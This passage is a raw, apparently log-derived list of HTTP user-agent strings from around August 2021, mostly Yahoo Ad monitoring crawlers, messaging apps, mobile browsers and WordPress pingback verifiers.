https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629273561-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629260776-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629265848-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629284015-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.134 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Mobile Safari/537.36 PTST/210818.135342 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 8.0.0; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629273440-0 +GoogleAuth/1.4 (OnePlus8TTMO RP1A.201005.001); gzip,gzip(gfe),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629332437-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629339431-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 +yacybot (/global; amd64 Linux 5.13.10-gentoo; java 11.0.12; Europe/de) http://yacy.net/bot.html +WhatsApp/2.2132.6 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629365431-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629373791-0 +WhatsApp/2.21.160.17 i +Faraday v0.14.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629389289-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629397866-0 +WhatsApp/2.21.17.16 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629332979-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629339969-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629377930-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629390182-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629398473-10 +WhatsApp/2.21.17.17 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629335219-0 +WordPress/5.8; https://expertogeek.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629342367-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629344320-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629368661-0 +WordPress/5.5.5; https://www.activaventas.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629376702-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629385804-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629392281-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629400445-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629414255-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629414256-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 PTST/210818.135342 +Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/11.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Mobile Safari/537.36 PTST/210819.154939 +WordPress/5.8; https://blrk.in +WordPress/4.5.24; http://realbigelephant.com +WordPress/5.3.8; https://aleksandrafuks.ru +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.k8s.crawler-production/1629356948-60 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 6.0; Micromax_Q4101 ) U2/1.0.0 Mobile +Java/1.7.0_261 +Mozilla/5.0 (Linux; Android 5.0; SM-G920A) AppleWebKit (KHTML,\xC2\xA0like Gecko) Chrome Mobile Safari (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) +RobotsTxtParser-VIPnytt/2.1 (+https://github.com/VIPnytt/RobotsTxtParser/blob/master/README.md) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629418791-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629427632-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.275 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629419518-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629424221-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629428811-10 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-07@moz.com) +DuckDuckGo/0.15.0 CFNetwork/1128.0.1 Darwin/19.6.0 (x86_64) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629477566-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629422082-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629430954-0 +WordPress/5.7.2; https://pornoaffee.com +YOURLS v1.8.1 +http://yourls.org/ (running on https://shortest.link) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629481215-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629481634-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 PTST/210819.154939 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 8.0.0; SM-N910H ) U2/1.0.0 Mobile +WordPress/5.8; https://www.catapultsystems.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629508023-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629585307-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629507157-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629514792-0 +WhatsApp/2.21.17.19 A +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4618.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.21.17.18 A +WordPress/5.8; https://remontsupers.ru +WordPress/5.8; https://login4portal.xyz +WordPress/5.8; https://www.inmotionhosting.com/support; verifying pingback from 199.250.205.40 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629593478-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629600475-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629609206-0 +WordPress/5.7.2; https://posteingangg.de +Snapchat/11.41.0.36 (iPhone11,2; iOS 14.6; gzip) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.k8s.crawler-production/1629656219-0 +WordPress/5.8; https://testpm.phanmemfree.org +WhatsApp/2.2132.6 webclient/10.0.19042 Device/win_desktop +PHP/5.2.20 +PHP/7.2.78 +WordPress/5.7.2; https://maygiattot.com; verifying pingback from 137.59.105.253 +FeedBurner/1.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629688310-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629719235-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629729307-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629679477-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629685699-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629725632-0 +WordPress/5.8; https://shiphangnhanh.com.vn +PHP (www.checkwebsite.pro), hosted by www.ukraine.com.ua +WordPress/5.8; https://xn--80acczfkfkfb5b3isf.com +WordPress/5.2.11; https://hitpo.ru +WordPress/5.8; https://technicaljayendra.com +ZEUSHDTHREE-v4.0.0 +WhatsApp/2.2133.1 N +WebCopier v7.0 +WhatsApp/2.21.161.1 i +WhatsApp/2.21.18.1 A +WordPress/5.8; https://askphpquestions.com +PHP/6.3.98 +PHP/6.3.29 +PHP/6.2.82 +WordPress/5.6.4; http://www.fonderiechapon.com; verifying pingback from 75.119.133.125 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629764669-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629771495-10 +Tiny Tiny RSS/21.07-73d1433 (http://tt-rss.org/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629825533-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629831342-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629840110-10 +WhatsApp/2.21.18.2 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629766488-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629772887-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629827647-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629833145-0 +WhatsApp/2.21.16.21 A +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.0.1; Micromax_Q4101 ) U2/1.0.0 Mobile +ddg_android/5.94.3 (com.duckduckgo.mobile.android; Android API 23) +WordPress/5.8; https://soda102.ru +WordPress/5.8; https://ctroim-vce.ru +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 4.4.2; LG-X230 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629908846-0 +WordPress/5.8; https://www.tachytelic.net +WordPress/5.4.6; http://sitewallah.com; verifying pingback from 170.83.240.214 +WordPress/4.9.18; http://inlandfinancial.net; verifying pingback from 101.255.85.122 +WordPress/5.1.8; http://www.consulenzaimmobiliareroma.it; verifying pingback from 62.210.101.30 +WordPress/5.7.2; https://baskobrin.ru +WordPress/4.9.3; https://www.topfloridabusiness.com; verifying pingback from 165.231.84.225 +WordPress/5.6.4; http://dianabol.skaka.org; verifying pingback from 196.199.122.128 +WordPress/4.1.33; http://cabinet-cros.fr; verifying pingback from 192.109.165.73 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629855919-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629934097-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629852859-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629861124-0 +WhatsApp/2.21.16.16 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629869979-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629924607-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 6.0; SM-C111 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 5.1; SM-J727T1 ) U2/1.0.0 Mobile +WordPress/5.8; https://7ik.ru +WordPress/5.7.2; https://phanmemfree.org +WordPress.com; https://logincast.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629989150-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +PHP/6.3.86 +WordPress/5.8; https://dgl.drsofter.ru +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1629985076-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1629992512-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629940030-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629946935-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629950319-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629961669-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1629970080-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629974913-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1629977324-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1629986884-0 +WhatsApp/2.21.18.3 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1629994085-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1630006943-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 8.0.0; SM-N900 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629944180-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629951835-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629959877-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1629970659-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1629977666-0 +Mozilla/5.0 (compatible; heritrix/3.4.0 +https://www.kb.dk/netarkivindsamling/) +test search engine/Nutch-1.19-SNAPSHOT +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630030495-10 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-48@moz.com) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630040594-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630040634-10 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) adbeat.com/policy Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630025515-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630032413-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +WhatsApp/2.21.18.4 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630034551-0 +GoogleAuth/1.4 (c2q RP1A.200720.012); gzip,gzip(gfe),gzip(gfe) +Apache-HttpClient/4.5.13 (Java/11.0.8) +WordPress/5.8; https://sitefordev.com +WordPress/5.7.2; https://collegeofrealestate.net; verifying pingback from 107.152.243.16 +WordPress/5.6.4; http://dianabol.skaka.org; verifying pingback from 190.123.212.17 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630110233-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630117302-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630111946-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630118878-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630123500-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630137613-0 +WhatsApp/2.21.18.6 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~myappid-141323) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630148990-0 +Apache-HttpClient/4.5.10 (Java/1.8.0_261) +PHP/7.2.61 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630196459-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630196461-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630209576-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630209586-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630209619-10 